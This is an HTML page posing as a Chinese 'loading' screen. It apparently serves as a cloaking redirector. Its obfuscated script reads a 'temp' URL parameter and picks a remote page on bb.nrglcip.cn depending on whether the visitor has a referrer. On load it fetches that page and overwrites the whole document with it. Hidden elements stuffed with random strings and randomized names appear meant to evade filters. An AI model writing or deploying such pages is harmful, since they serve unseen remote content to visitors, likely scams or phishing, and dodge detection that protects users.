<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xJ70GzJCT {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xJ70GzJCT .gvQGVT3x {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xJ70GzJCT .content {
            line-height: 50px;
            text-align: center
        }

        .xJ70GzJCT .img {
            width: 100%
        }

        .xJ70GzJCT .cFT9Us02 {
            text-align: center
        }

        .xJ70GzJCT .cFT9Us02 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xJ70GzJCT .cFT9Us02 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xJ70GzJCT .cFT9Us02 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xJ70GzJCT .cFT9Us02 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xJ70GzJCT .cFT9Us02 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xJ70GzJCT .cFT9Us02 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xJ70GzJCT .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iFMhVb6nX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var AJC4kSo = iFMhVb6nX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ AJC4kSo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ AJC4kSo +".html?a=share";
		}
		
        SGiFUtQe=url+"#"+new Date().getTime();
        SGiFUtQe && function() {
            $.get(SGiFUtQe, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>fBhyD6XeaJOVPkls9J4IXKRx5tJFXtRt4cBTVDVBCNYYLYmfpiLYxeFftxq4cXB</div>
<div style='display:none'>fBhyD6XeaJOVPkls9J4IXKRx5tJFXtRt4cBTVDVBCNYYLYmfpiLYxeFftxq4cXB</div>
<div style='display:none'>fBhyD6XeaJOVPkls9J4IXKRx5tJFXtRt4cBTVDVBCNYYLYmfpiLYxeFftxq4cXB</div>
<div style='display:none'>fBhyD6XeaJOVPkls9J4IXKRx5tJFXtRt4cBTVDVBCNYYLYmfpiLYxeFftxq4cXB</div>
<p  style='display:none'>CuwQkoBuKxTt55ahwkwA5g4SVgpCth3aCp5HIqqdyEJ3gP980q9SYRmaj2C8</p>
<a  href='#' style='display:none'>PqsUNnHVVpvUDSYBhwtyC1ae7mkH2wYQzJb4uAIwDLaLbTS54Zo2Mzii7</a>
<p  style='display:none'>CuwQkoBuKxTt55ahwkwA5g4SVgpCth3aCp5HIqqdyEJ3gP980q9SYRmaj2C8</p><div class="xJ70GzJCT">
    <div class="gvQGVT3x">
        <div class="cFT9Us02">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>YNEseb7seYt1Gbszs9Bj9Rvh454M2YVfSlsqANIZtDDV2opjMKVhkoW</span>
<a  href='#' style='display:none'>ZVhGKJ5RjkfpikhCGqYM9WFk6HgQpSXYLeu8pr19ndx</a>
<h1 style='display:none' >twaHBb2BXe39oD8x1VVpdtOYs3JhlMSGtq2D8IiACsLrkEJReTNKWM4m60gexoadeB19Zvz6l4w8pyXtx</h1>
<div style='display:none'>GupXv3ZsftrIR8WX5uwygAE0bcb58Bq0PnJOASxi9Xe7ADP09z9AdlgzelPlhWtHf8HrotOfffHHaC8ez7akCIi8Zcsar39</div>
<span style='display:none'>YNEseb7seYt1Gbszs9Bj9Rvh454M2YVfSlsqANIZtDDV2opjMKVhkoW</span>
<li style='display:none' >GRl3et9Re0rpR2q0Vbq8s8MDmd07SfoS4NodOMAnzUzsJlyZBToCOckuvwJwDWbzC14SAoDLcryc395J7h1uPGa0hEf7ANi</li>
<img  src='' style='display:none'></body>
</html>